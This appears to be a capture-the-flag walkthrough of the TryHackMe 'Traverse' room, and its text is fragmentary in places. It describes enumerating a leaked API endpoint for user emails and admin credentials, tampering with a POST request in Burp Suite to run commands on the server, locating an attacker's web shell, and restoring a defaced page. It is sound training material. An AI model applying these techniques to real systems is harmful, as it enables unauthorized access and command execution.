Table of contents
This walkthrough will go over the Traverse room found on TryHackMe. This box aims to test your knowledge of secure software principles while introducing you to API endpoints and ways to manipulate parameters to obtain critical information. Additionally, you're presented with an opportunity to tailor HTTP requests in order to POST commands to further enumerate the backend server.
At first glance, this looks like
HEX. Let's confirm it and decrypt it using CyberChef.
What is the flag value after deobfuscating the file?
Decrypting further with
Logging is an important aspect. What is the name of the file containing email dumps?
Going back to the source code on lines
26 reveals a directory. Let's check it out.
Sure enough, there's our
email_dump.txt file. Let's see what it contains.
The logs folder contains email logs and has a message for the software team lead. What is the name of the directory that Bob has created?
Hmmm... So the directory is named after the first phase of the SDLC,
What is the key file for opening the directory that Bob has created for Mark?
Going back to the content found in the
email_dump.txt file reveals the key for opening the directory. Putting the key we obtained into the form brings us to our API content.
What is the email address for ID 5 using the leaked API endpoint?
Taking API endpoint syntax and plugging it into our base URL displays raw data in JSON format.
What is the ID for the user with admin privileges?
Playing around with the
id numbers reveals our admin user.
What is the endpoint for logging in as the admin? Mention the last endpoint instead of the URL. For example, if the answer is URL is tryhackme.com/admin - Just write /admin.
The attacker uploaded a web shell and renamed a file used for managing the server. Can you find the name of the web shell that the attacker has uploaded?
First, we need to log in to track down this web shell. We can use the credentials obtained through the API endpoint.
Logging in brings us to this Admin Page.
POST request through
Burp Suite allows us to manipulate the command beyond what was intended.
We can accomplish this in 4 simple steps:
Route traffic from our browser via
FoxyProxy(my preferred way).
Right-ClickIntercepted request and send to
lsto view content in the current working directory and gain more information.
What is the name of the file renamed by the attacker for managing the web server?
This can be retrieved from the response to our tailored
Burp Suite request.
Can you use the file manager to restore the original website by removing the "FINALLY HACKED" message? What is the flag value after restoring the main website?
We can do this by going to
/realadmin/REDACTED_****_*****er.php and typing in our discovered password.
index.php and selecting the Advanced Editor gives us the ability to remove the "Finally Hacked" message as well as retrieve our final flag.